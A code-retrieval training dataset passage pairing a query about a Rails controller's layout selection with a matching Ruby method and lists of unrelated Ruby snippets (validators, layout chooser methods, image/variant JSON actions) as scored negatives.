args << aliases.join(', ')\n end\n end\n errors.add(real_name, format % args)\n end\n end\n end\n end",
"def time_params\n if params[:twelve].present? && params[:twelve][:start_time].present? && params[:twelve][:end_time].present?\n #@start_time = Date.new(\"#{params[\"start_time(1i)\"]}\".to_i,\"#{params[\"start_time(2i)\"]}\".to_i,\"#{params[\"start_time(3i)\"]}\".to_i)\n #@end_time = Date.new(\"#{params[\"end_time(1i)\"]}\".to_i,\"#{params[\"end_time(2i)\"]}\".to_i,\"#{params[\"end_time(3i)\"]}\".to_i)\n #params.require(:twelve).permit(:start_time, :end_time)\n @start_time = params[:twelve][:start_time].to_date\n @end_time = params[:twelve][:end_time].to_date\n else\n @start_time = Date.new(Time.now.year,1,1)\n @end_time = Date.new(Time.now.year,12,31)\n flash[:notice] = \"Deverão ser preenchidas as datas de início e fim.\"\n end\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless object_type_validator.valid?(@object_type)\n hardware_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless hardware_status_validator.valid?(@hardware_status)\n reason_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless reason_validator.valid?(@reason)\n software_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless software_status_validator.valid?(@software_status)\n status_validator = EnumAttributeValidator.new('String', [\"Incomplete\", \"Not-Found\", \"Not-Listed\", \"Validated\", \"Not-Evaluated\"])\n return false unless status_validator.valid?(@status)\n true && super\n end",
"def process_date_params\n \n puts \"processing data params\"\n \n # Checks start and end dates. Likewise if there is an error the default\n # is to send the entire timeseries\n begin\n puts \"date time found\"\n params[:start_date] = DateTime.parse(params[:start_date]) unless params[:start_date].nil?\n params[:end_date] = DateTime.parse(params[:end_date]) unless params[:end_date].nil?\n params[:start_date] = Interaction.order('count_date asc').first.count_date if params[:start_date].nil?\n params[:end_date] = DateTime.now if params[:end_date].nil?\n rescue\n puts \"no date_time found\"\n params[:start_date] = Interaction.order('count_date asc').first.count_date\n params[:end_date] = DateTime.now\n end\n end",
"def validate_start_and_stop_date\n if active_date\n if active_start_date.nil? or active_stop_date.nil?\n errors.add(:active_date, \"start date or end date not set\")\n end\n end\n end",
"def valid?\n return false if @created_time.nil?\n return false if @last_modified_time.nil?\n return false if @token.nil?\n return false if @user_token.nil?\n return false if @card_product_token.nil?\n return false if @last_four.nil?\n return false if @pan.nil?\n return false if @expiration.nil?\n return false if @expiration_time.nil?\n return false if @barcode.nil?\n return false if @pin_is_set.nil?\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"ACTIVE\", \"SUSPENDED\", \"TERMINATED\", \"UNSUPPORTED\", \"UNACTIVATED\"])\n return false unless state_validator.valid?(@state)\n return false if @state_reason.nil?\n return false if @fulfillment_status.nil?\n fulfillment_status_validator = EnumAttributeValidator.new('String', [\"ISSUED\", \"ORDERED\", \"REORDERED\", \"REJECTED\", \"SHIPPED\", \"DELIVERED\", \"DIGITALLY_PRESENTED\"])\n return false unless fulfillment_status_validator.valid?(@fulfillment_status)\n instrument_type_validator = EnumAttributeValidator.new('String', [\"PHYSICAL_MSR\", \"PHYSICAL_ICC\", \"PHYSICAL_CONTACTLESS\", \"PHYSICAL_COMBO\", \"VIRTUAL_PAN\"])\n return false unless instrument_type_validator.valid?(@instrument_type)\n true\n end",
"def valid_attributes\n {\n :executed => 1.day.ago,\n :sequence_source_id => sequence_source.id,\n }\n end",
"def validate_can_assign_auction_date\n if self.ready_for_auction? && \n (self.auction_datum.blank? || (self.auction_datum.present? && self.auction_datum.auction_date.blank? )) &&\n self.service_orders.joins(:service_order_details).where(\"service_order_details.status=? AND service_orders.priority=?\", ServiceOrder::SO_STATUS_APPROVED, ServiceOrder::SO_PRIORITY_HIGH).count > 0\n self.errors.add(:\"auction_datum.auction_date\", I18n.t(\"models.vehicle.errors.service_order_must_be_completed\"))\n end\n end",
"def required_fields\n # \"cid\" is not required\n [\n \"byr\",\n \"ecl\",\n \"eyr\",\n \"hcl\",\n \"hgt\",\n \"iyr\",\n \"pid\",\n ]\nend",
"def validate_contract_data?\n initial_call_off_period.present? ? initial_call_off_period.positive? : false\n end",
"def validate_contract_data?\n initial_call_off_period.present? ? initial_call_off_period.positive? : false\n end"
] | [
"0.6687193",
"0.6550766",
"0.6403036",
"0.6324402",
"0.63084084",
"0.6258411",
"0.6142323",
"0.6122722",
"0.6114756",
"0.6105565",
"0.6075499",
"0.60739017",
"0.60556495",
"0.6054276",
"0.6021295",
"0.60072136",
"0.59912485",
"0.5980923",
"0.597026",
"0.5969717",
"0.59487826",
"0.59352463",
"0.59222066",
"0.5915313",
"0.59116805",
"0.5903267",
"0.5898966",
"0.5893766",
"0.5887096",
"0.5877553",
"0.5862483",
"0.58567303",
"0.5841634",
"0.58361727",
"0.5818827",
"0.58126265",
"0.57922894",
"0.57799566",
"0.57623786",
"0.5755367",
"0.5753662",
"0.5752486",
"0.5728392",
"0.57277364",
"0.5713894",
"0.57098657",
"0.5705771",
"0.5693951",
"0.56847453",
"0.56843936",
"0.568321",
"0.56825405",
"0.5677659",
"0.56772023",
"0.5676393",
"0.566792",
"0.56605077",
"0.5658097",
"0.5657788",
"0.56495744",
"0.56462765",
"0.5645689",
"0.5645263",
"0.5641974",
"0.5640205",
"0.5639353",
"0.56360584",
"0.5635598",
"0.5634544",
"0.5633653",
"0.5630466",
"0.56281394",
"0.5614547",
"0.56137496",
"0.56008095",
"0.559009",
"0.55893874",
"0.5586347",
"0.5584432",
"0.55738974",
"0.5571048",
"0.55648553",
"0.55600977",
"0.55568683",
"0.555395",
"0.55496275",
"0.55449086",
"0.55375934",
"0.5536502",
"0.5530118",
"0.5528279",
"0.5525432",
"0.5525124",
"0.5521982",
"0.55213076",
"0.5520739",
"0.55168897",
"0.5514062",
"0.5512534",
"0.5509966",
"0.5509966"
] | 0.0 | -1 |
application controller will attempt to determine layout based on params or current page unless it is specified on the subclass | def determine_layout
return @__layout if @__layout
return false if params[:_no_layout] || request.xhr?
@__layout ||= current_page.layout.try(:template) if current_page.present?
@__layout ||= 'application/default'
@__layout
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def layout_for_page\n if params[:layout] == 'none' || params[:layout] == 'false'\n false\n else\n params[:layout] || 'application'\n end\n end",
"def determine_layout\n ['show'].include?(action_name) ? 'application' : nil \n end",
"def layout\n self.class.layout || @app.layout\n end",
"def get_layout_from_params\n params[:layout] ? params[:layout] : 'application' \n end",
"def choose_layout \n if [ 'index', 'new', 'create','zones' ].include? action_name\n 'application'\n else\n 'application'\n end\n end",
"def set_stall_layout\n return false if request.xhr?\n return Stall.config.default_layout if Stall.config.default_layout\n\n parent_controller = self.class.ancestors.find do |ancestor|\n !ancestor.name.to_s.match(/^Stall::/) && Class === ancestor\n end\n\n parent_controller._layout ||= 'application'\n end",
"def default_layout_for_request\n return params[:__layout] if params[:__layout]\n return params[:layout] if params[:layout]\n 'application'\n end",
"def set_layout\n params[:action] == 'index' ? 'admin' : (params[:layout] || 'realestate')\n end",
"def set_layout\n if request.xhr?\n self.class.layout false\n else\n self.class.layout \"application\"\n end\n end",
"def choose_layout\r\n return nil if action_name=='show'\r\n return 'usercenter' if action_name=='index' || action_name=='new'\r\n return 'public'\r\n end",
"def dynamic_layout\n # ALL THIS SUCKS, I KNOW..\n \n # No layout for AJAX calls\n @layout = if request.xhr? \n nil\n # dialog param = lightview popup\n elsif params[:dialog]\n 'dialog'\n # uses user 'role' name for layout ... bad\n elsif current_user && !current_user.role.nil?\n current_user.role.downcase\n # no user, check for 'about' action\n elsif controller_name == 'about'\n 'about'\n # none of the above, use Rails default\n else\n 'home'\n end\n return nil unless @layout\n \n Rails.logger.debug \"Dyamic layout = #{@layout}\"\n # Layouts further divided by site subdomain: www vs vault\n if current_subdomain == 'vault'\n # Then public vs logged in...ugh\n if current_user\n @layout = 'vault/private/' + @layout\n else\n @layout = 'vault/public/' + @layout\n end\n end\n @layout\n end",
"def current_layout\n controller.send :_layout # private method\n end",
"def set_layout\n if 1==1\n 'application'\n else\n 'dean'\n end\n end",
"def layouts; end",
"def layouts; end",
"def layout_by_resource\n if request.original_url.include? \"/wechat_service/\" \n 'wechat_service_application'\n else\n if devise_controller?\n 'devise'\n else\n 'application'\n # case action_name \n # when 'index' then 'list'\n # when 'show', 'new', 'edit', 'update', 'create' then 'form'\n # else 'application' end if controller_name != 'home'\n end\n end \n\n end",
"def set_layout\n if %w( print plain ).include? params[:layout]\n params[:layout]\n else\n 'default'\n end\n end",
"def layout; end",
"def layout\n case @mode\n when :injector\n \"injector\"\n when :page\n \"application\"\n else\n false\n end\n end",
"def layout\n @layout\n end",
"def page_layout\n if @page\n if params[:popup]\n \"modal\"\n elsif !@page.layout.blank?\n @page.layout\n else\n choose_layout\n end\n else\n params[:popup] ? 'modal' : choose_layout\n end\n end",
"def determine_layout\n case action_name\n when \"new\"\n \"hero\"\n when \"create\"\n \"hero\"\n when \"edit\"\n \"dashboard\"\n when \"update\"\n \"dashboard\"\n end\n end",
"def get_layout\n\tlogged_in? and :page_user or :page_visitor\nend",
"def layout\n lookup_layout\n end",
"def default_layout\n site.config.page_layout\n end",
"def action_has_layout?; end",
"def layout\n nil\n end",
"def layout\n nil\n end",
"def determine_layout\n request.xhr? ? 'ajax' : common_layout\n end",
"def layout\n # only turn it off for login pages:\n # is_a?(Devise::SessionsController) ? \"sign_in_up\" : \"application\"\n # or turn layout off for every devise controller:\n #devise_controller? && \"application\"\n @categories ||= Category.ordered.with_memories \n\n if devise_controller? && params[:controller] == \"sessions\" || params[:controller] == \"registrations\" && params[:action] == \"new\" || \n params[:controller] == \"registrations\" && params[:action] == \"create\" || params[:controller] == \"passwords\" && params[:action] == \"new\" ||\n params[:controller] == \"confirmations\" && params[:action] == \"show\" \n \"sign_in_up\"\n else\n \"application\"\n end\n \n \n end",
"def page_layout\n @user = User.current\n @blocks = @user.pref.my_page_layout\n end",
"def layout \n return @layout\n end",
"def layout_type\n if params[:controller] == \"catalog\"\n if params[:action] == \"show\" || params[:action] == \"downloads\"\n \"item\"\n elsif params[:action] == \"index\"\n \"index\"\n end\n else\n \"default\"\n end\n end",
"def books_layout\n if params[:action] == 'show'\n 'reading'\n elsif params[:action] == 'edit' || params[:action] == 'new'\n 'writing'\n else\n 'application'\n end\n end",
"def set_layout\n\t \treturn \"landing\" if action_name == \"unregistered\"\n\t \tsuper\n\t end",
"def determine_layout\n request.xhr? ? 'ajax' : 'application'\n end",
"def default_layout_for_request\n layout =\n case\n when params[:_layout] || params[:layout]\n l = params[:_layout] || params[:layout]\n l == 'false' ? false : l\n when request.xhr? || params[:xhr]\n false\n else\n default_layout\n end\n end",
"def layout(layout_type)\n\t\t#most content. that is loaded into the artist content area (just content)\n\t\tif layout_type.nil? || layout_type.blank?\n\t\t\t@layout = false\n\t\t\t@hook = \"#content\"\n\t\t#when artist page has to be loaded (logo, nave and content)\n\t\telsif layout_type == \"artist\"\n\t\t\t@layout = \"layouts/artist_admin_and_artist_floating_content.html.erb\"\n\t\t\t@hook = \".dynamicContent\"\n\t\tend\n\tend",
"def layout_container_class\n if params[:controller] == \"events\" && params[:action] == \"show\"\n \"event container\"\n else\n \"container\"\n end\n end",
"def show\n @layout_details = {\n controller: params[:controller],\n action: params[:action],\n styles: [],\n other_styles: [\"scaffolds\"],\n scripts: [],\n other_scripts: [\"scaffolds\"]\n }\n\tend",
"def resolve_layout\n\t case action_name\n\t when 'index'\n\t \t'blank'\n\t else\n\t 'application'\n\t end\n\t end",
"def set_layout\n if current_paciente != nil\n \"pacientes_pages\"\n else\n \"nutriologo_pages\"\n end\n end",
"def layout\n @layout ||= layout_class.new(@rack_context)\n end",
"def render_page_layout\n render @page, page: @page\n rescue ActionView::MissingTemplate\n warning(\"PageLayout: '#{@page.page_layout}' not found. Rendering standard page_layout.\")\n render \"alchemy/page_layouts/standard\", page: @page\n end",
"def site_layout\n if params[:action].to_s.in?(gift_actions)\n \"gift_application\"\n else\n \"application\"\n end\n end",
"def layout layout = nil, *actions\n if (layout || layout == false) && configurable?\n @layouts ||= Hash.new\n layout = layout.to_s unless layout == false\n if actions.size == 0\n actions = ['*']\n @master_layout = layout\n end\n actions.each { |a| @layouts[a] = layout }\n end\n @setup[:layouts] ||= @layouts ||\n (@controller.ctrl.slice.view.layout if @controller) || {}\n end",
"def configure\n # fetching page via before filter\n if @page.redirects_to_external?\n render action: 'configure_external', layout: !request.xhr?\n else\n @page_layouts = PageLayout.layouts_with_own_for_select(@page.page_layout, session[:language_id], @page.layoutpage?)\n render layout: !request.xhr?\n end\n end",
"def layout_name\n controller = @tracker.controllers[@current_class]\n\n return controller[:layout] if controller[:layout]\n return false if controller[:layout] == false\n\n app_controller = @tracker.controllers[:ApplicationController]\n\n return app_controller[:layout] if app_controller and app_controller[:layout]\n\n nil\n end",
"def resolve_layout\n case action_name\n when 'index'\n 'dashboard'\n else\n 'application'\n end\n end",
"def default_layout\n 'default' if html?\n end",
"def set_layout\n request.xhr? ? 'empty' : 'application'\n end",
"def determine_layout\n 'akinu'\n end",
"def layout\n @current_layout ||= :default_layout\n send(\"#{@current_layout}\"){ yield }\n end",
"def custom_layout\n case action_name\n when \"edit\"\n \"profile\"\n when \"dashboard\"\n \"profile\"\n when \"show\"\n \"profile\"\n when \"change_password\"\n \"profile\"\n when \"admin_user\"\n \"profile\"\n when \"adminuser_logs\"\n \"profile\"\n when \"add_adminuser\"\n \"profile\"\n when \"add\"\n \"profile\"\n when \"upload\"\n \"profile\"\n when \"product_manager_logs\"\n \"profile\"\n when \"show\"\n \"profile\"\n when \"suspend\"\n \"profile\" \n else\n \"application\"\n end\n end",
"def layout_for\n if devise_controller?\n 'full_page'\n else\n 'application'\n end\n end",
"def master_layout\n @setup[:master_layout] ||= @master_layout ||\n (@controller.ctrl.slice.view.master_layout if @controller)\n end",
"def layout\n if request.xhr?\n return false\n else\n return 'application'\n end\n end",
"def layout\n return false unless layouts = controller.ancestral_trait[:layout]\n\n possible = [layouts[path], layouts[:all]].compact\n denied = layouts[:deny].to_a\n\n if layout = possible.first\n if layout.to_s !~ /\\A\\// # late bind layout action to current controller\n layout = R(controller, layout)\n end\n layout_action = Controller.resolve(layout)\n\n return false if denied.any?{|deny| deny === path} or layout_action.path == path\n\n if layout_action.controller != controller\n instance.instance_variables.each do |x|\n if layout_action.instance.instance_variable_defined?(x)\n Log.warn \"overwriting instance variable #{x} from layout controller with instance variable from action controller.\"\n end\n layout_action.instance.instance_variable_set(x, instance.instance_variable_get(x))\n end\n else\n layout_action.binding = binding\n layout_action.controller = controller\n layout_action.instance = instance\n end\n\n layout_action.path = nil\n layout_action\n end\n end",
"def set_page_layout\n @page_layout = PageLayout.find(params[:id])\n end",
"def app_layout\n layout_content = read_view :application, :folder => 'layouts' #, :type => :erb\n\n [:alert, :notice].each{|name| insert_flash_displayer name}\n end",
"def get_page_layout(params)\n if params[:layout] == 'comatose_content'\n File.join(plugin_layout_path, params[:layout])\n else\n params[:layout]\n end\n end",
"def app_layout\n layout_content = read_view :layouts => :application \n [:alert, :notice].each{|name| insert_flash_displayer name, layout_content}\n end",
"def define_layout\n if user_signed_in?\n if current_user.student?\n case params['action']\n when \"show\"\n 'information_student' \n when \"events\"\n 'information_student'\n when \"frequency\"\n 'information_student' \n else\n 'student' \n end\n else\n if params['action'] == 'declaration_of_studying'\n 'print'\n else\n if params['action'] == 'daily'\n 'print'\n else\n if params['action'] == 'down_average'\n 'print'\n else\n if params['action'] == 'print'\n 'print'\n else\n if params['action'] == 'report_calendar'\n 'print'\n else\n if params['action'] == 'report_re_enrollments'\n 'print'\n else\n if params['action'] == 'report_schedules'\n 'print' \n else\n if params['action'] == 'report'\n 'print_not_head'\n else\n if params['action'] == 'report_teacher'\n 'print_not_head' \n else\n if params['action'] == 'buy_books'\n 'print_not_head'\n else\n if params['action'] == \"envelopes_for_exams\"\n 'print_not_head' \n else\n if params['controller'] == 'warnings' and params['action'] == 'show'\n 'print' \n else\n if params['controller'] == 'calendars' and params['action'] == 'show'\n nil \n else\n if params['controller'] == 'companies' and params['action'] == 'print_informations'\n 'print_head_javascript'\n else\n \n if params['controller'] == 'companies' and params['action'] == 'students_for_neighborhood'\n \"print\"\n else\n if params['controller'] == 'companies' and params['action'] == 'lists'\n \"print\"\n else\n if params['controller'] == 'companies' and params['action'] == 'students_for_level'\n \"print\"\n else\n nil \n end\n end \n end\n end\n end\n end\n end \n end\n end\n end\n end\n end\n end\n end\n end\n end\n \n end\n end\n else\n \"login\"\n end\n end",
"def getlayout\n \n \tif request.xhr?\n \t\tfalse\n \telse\n \t\t'application'\n \tend\n end",
"def determine_layout\n current_user ? 'logged_in' : 'not_logged_in'\n end",
"def layout\n if request.xhr?\n return false\n else\n return 'application'\n end\n end",
"def layout_by_resource\n\t\tif devise_controller?\n\t\t\t\"dashboard\"\n\t\telse\n\t\t\t\"application\"\n\t\tend\n\tend",
"def choose_layout\n Rails.configuration.blog.layout\n end",
"def get_page_layout\n if params[:layout] == 'comatose_content'\n File.join(plugin_layout_path, params[:layout])\n else\n params[:layout]\n end\n end",
"def _conditional_layout?; end",
"def set_layout\n if devise_controller? #&& resource_class == Admin\n if params[:controller] == 'devise/registrations' and params[:action] == 'edit'\n \"application\"\n else\n \"devise_layout\"\n end\n end\n end",
"def current_layout\n @site_layout ||= SiteLayout.first\n end",
"def choose_layout\n logger.info \"\\n HOST #{request.host}\\n\"\n if current_user.present?\n if current_user.role?(:admin)\n 'backend_admin'\n else\n 'backend'\n end\n else\n 'application'\n end\n end",
"def controller_layout\n layout = self.send(:_layout)\n if layout.instance_of? String\n layout\n else\n File.basename(layout.identifier).split('.').first\n end\n end",
"def place_in_layout?; end",
"def place_in_layout?; end",
"def show\n @page_layout = PageLayout.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @page_layout }\n end\n end",
"def layout_by_resource\n if devise_controller?\n \"landing\"\n else\n \"application\"\n end\n end",
"def custom_layout\n case action_name\n when \"industry_xls\"\n \"no_layout\"\n when \"supplier_profiles\"\n \"no_layout\"\n when \"total_xls\"\n \t \"no_layout\"\n when \"industry_level\"\n \"no_layout\"\n when \"supplier_level\"\n \"no_layout\"\n when \"company_xls\"\n \t\"no_layout\"\n when \"customer_record\"\n \t\"no_layout\"\n when \"most_company_xls\"\n \t\"no_layout\"\n when \"conversion_industry\"\n \t\"no_layout\"\n when \"conversion_company\"\n \t\"no_layout\"\n when \"company_xls\"\n \t\"no_layout\"\t\n when \"suppliers_profiles\"\n \t\"no_layout\"\n when \"registered_suppliers\"\n \t\"no_layout\"\n when \"unregistered_suppliers\"\n \t\"no_layout\"\n when \"all_customers\"\n \t\"no_layout\"\n when \"jagent\"\n \t\"no_layout\"\n when \"sagent\"\n \t\"no_layout\"\n when \"poll\"\n \"no_layout\"\t\n when \"industry_conversion\"\n \"no_layout\"\t\n when \"company_conversion\"\t\t\n \"no_layout\"\n when \"reviews_processed\"\n \"no_layout\"\n when \"agent_output\"\n \"no_layout\"\n when \"agent_performance\"\n \"no_layout\"\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n else\n \"admin\"\n end\n end",
"def layout\n \"application\"\n end",
"def layout(method = nil)\n @layout = method || @layout\n end",
"def set_layout\n response_code == 200 ? :\"layouts/application.#{@response.output_format}\" : nil\n end",
"def set_layout_flag\n @is_home_page = true\n end",
"def resolve_layout\n case action_name\n when \"create\", \"new\", \"index\"\n \"useraccount_layout\"\n else\n \"application\"\n end\n end",
"def get_content_for_layout()\n get_partial(@type)\n # if @type == \"home\"\n # get_partial('home')\n # elsif @type == \"page\"\n # get_partial('page')\n # elsif @type == \"article\"\n # get_partial('article')\n # elsif @type == \"category\"\n # get_partial('category')\n # end\n end",
"def layout_by_resource\n if devise_controller? && resource_class == Pilot\n \"pilot_devise\"\n elsif devise_controller? && resource_class == Operator\n \"operator_devise\"\n else\n \"application\"\n end\nend",
"def choose_layout\n request.xhr? && uses_modal? ? false : super\n end",
"def layouts=(_arg0); end",
"def layouts=(_arg0); end",
"def specify_layout\n if devise_controller?\n if !(current_user.nil?)\n \"application\"\n else\n \"sign_in\"\n end\n else\n \"application\"\n end\n end",
"def choose_layout\n request.xhr? ? 'modal' : 'front'\n end",
"def choose_layout\n request.xhr? ? 'modal' : 'front'\n end",
"def layout\n return @layout if @layout\n return if no_layout?\n\n @layout = site.layouts[data.layout].tap do |layout|\n unless layout\n Bridgetown.logger.warn \"Generated Page:\", \"Layout '#{data.layout}' \" \\\n \"requested via #{relative_path} does not exist.\"\n end\n end\n end",
"def default_layout\n nil\n end",
"def static_layout\n nil\n end",
"def default_layout\n @user = User.current\n # remove block in all groups\n @user.pref[:my_page_layout] = nil\n @user.pref.save\n redirect_to :action => 'page_layout'\n end",
"def resolve_layout\n case action_name\n when \"edit\"\n \"editlayout\"\n when \"show_image\"\n \"application_png\"\n else\n \"application\"\n end\n end",
"def new\n @page_layout = PageLayout.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @page_layout }\n end\n end",
"def set_layout\n @layoutme = 1\n end",
"def show\n render layout: 'home'\n end"
] | [
"0.71749175",
"0.7162006",
"0.7027256",
"0.6980907",
"0.6917183",
"0.68840367",
"0.6877608",
"0.6793758",
"0.67735374",
"0.67581904",
"0.6729416",
"0.67260855",
"0.6697271",
"0.66890544",
"0.66890544",
"0.6635262",
"0.66183877",
"0.6584618",
"0.6550475",
"0.6541904",
"0.653372",
"0.65006804",
"0.6495991",
"0.64484453",
"0.64479303",
"0.6442261",
"0.6436061",
"0.64213216",
"0.64120597",
"0.63995975",
"0.639645",
"0.6396121",
"0.63726896",
"0.63635874",
"0.636341",
"0.6336849",
"0.63261265",
"0.6307993",
"0.6257147",
"0.625134",
"0.62448114",
"0.62275386",
"0.6217237",
"0.62152284",
"0.621424",
"0.61694324",
"0.61611986",
"0.6156502",
"0.61509484",
"0.61417264",
"0.61401117",
"0.6139096",
"0.6128187",
"0.6127131",
"0.61230636",
"0.6121924",
"0.60951483",
"0.60948324",
"0.60866576",
"0.608522",
"0.6067971",
"0.6065014",
"0.6054026",
"0.6053792",
"0.6047346",
"0.6042625",
"0.6036837",
"0.60320956",
"0.60231256",
"0.60061455",
"0.59963757",
"0.59950846",
"0.59950674",
"0.5991815",
"0.59797287",
"0.59797287",
"0.5950728",
"0.594826",
"0.5926326",
"0.59263164",
"0.5907631",
"0.59062576",
"0.5901988",
"0.58997434",
"0.5896648",
"0.58937323",
"0.58829224",
"0.5877107",
"0.5877107",
"0.58671093",
"0.5866169",
"0.5866169",
"0.58568746",
"0.5850727",
"0.5848813",
"0.5839869",
"0.5837307",
"0.5832929",
"0.582405",
"0.5823002"
] | 0.70369416 | 2 |
GET /variant_images GET /variant_images.json | def index
@variant_images = VariantImage.all
respond_to do |format|
format.html # index.html.erb
format.json { render json: @variant_images }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def show\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n\n respond_to do |format|\n format.html # show.html.erb\n format.js\n format.json { render json: @variant_image }\n end\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def index\n @product_images = ProductImage.where(product_uuid: params[:product_id])\n render json: @product_images, status: 200\n end",
"def images\n response = JSON.parse( self.class.get(\"#{BASE_URL}/contest/#{@api_key}/images\") )\n end",
"def image_list\n @images = Picture.where(album_id: params[:album_id])\n respond_to do |format|\n format.json { render json: @images.to_json(methods: [:path])}\n end\n end",
"def images\n IbmCloudRest.get \"#{@uri}/images\"\n end",
"def images() \n uri = URI.parse(\"http://\" + @location.host + \":9292/v2/images\")\n return get_request(uri, @token)\n end",
"def index\n @images = Image.all\n\n render json: @images\n end",
"def product_images\n user_id, product = params[:user_id], params[:id]\n return bad_request if !user_id || !product\n # returns all images for a given user and product\n images = UserProduct.find_images(user_id, product)\n # create json array\n img = images ? images.collect { |i| i.js_serialize } : []\n render :json => img\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def images(product_id, variation_id, params = {})\n path = \"/products/#{product_id}/variations/#{variation_id}/images\"\n\n response, status = BeyondApi::Request.get(@session,\n path,\n params)\n\n handle_response(response, status)\n end",
"def get_all_images(env)\n images_json = get(env, \"#{@session.endpoints[:image]}/images\")\n images = JSON.parse(images_json)['images']\n\n return images if images.empty?\n\n is_v1 = false\n unless images[0].key? 'visibility'\n is_v1 = true\n images_json = get(env, \"#{@session.endpoints[:image]}/images/detail\")\n images = JSON.parse(images_json)['images']\n end\n\n images.map do |i|\n i['visibility'] = i['is_public'] ? 'public' : 'private' if is_v1\n Image.new(i['id'], i['name'], i['visibility'], i['size'], i['min_ram'], i['min_disk'])\n end\n end",
"def list\n @api.get(\"#{@api.path}/Images\")\n end",
"def images\n @picturesandmeta = Pictureandmeta.all\n @kind = Kind.find(params[:kind_id])\n Rails.logger.info(\"Kind: #{@kind.inspect}\")\n end",
"def index\n @variants = Variant.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variants }\n end\n end",
"def _state_photos(state_id)\n get('state/photos', state_id, options: { type: :array })\n end",
"def items\n @beverages = Beverage.available\n respond_to do |format|\n format.json { render :json => @beverages.to_json(methods: :image_url)}\n end\n end",
"def index\n @pictures = Picture.where(foodscape_id: params[:foodscape_id])\n render json: @pictures\n end",
"def show\n render json: @family_image\n end",
"def images\n images = []\n JSON.parse(resource['/offerings/image'].get)[\"images\"].each do |img|\n images << Image.new(img)\n end\n return images\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.slim\n format.json { render json: @images }\n end\n end",
"def show\n render json:@web_display_car_image\n end",
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def get_sizes\n @item = Item.find(params[:id])\n @sizes = @item.variants_for(:size, nil, params[:colour])\n respond_to do |format|\n format.json { render :json => @sizes }\n end\n end",
"def get_images_data\t\t\t\t\t\t\n\t\t{ payload: { 'makes' => makes_dropdown, 'images' => images_array('none').compact}, success: true}\n\tend",
"def show\n @image_url = ImageUrl.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_url }\n end\n end",
"def getimagesinfo\n trek = Trek.find_by_id(params[:id])\n send_data(trek.get_images_info.to_json,\n {:type => \"application/json\", :disposition => \"inline\"})\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def images(params = {})\n @api.get(\"#{@api.path}/List/#{@id}/Images\", params: params)\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n render json: @web_car_gallery\n end",
"def index\n @family_images = FamilyImage.all\n\n render json: @family_images\n end",
"def show\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estate_agent_image }\n end\n end",
"def show\n @image_set = ImageSet.find(params[:id])\n\n render json: @image_set\n end",
"def index\n @images = getmydata(\"Image\")\n pagination\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
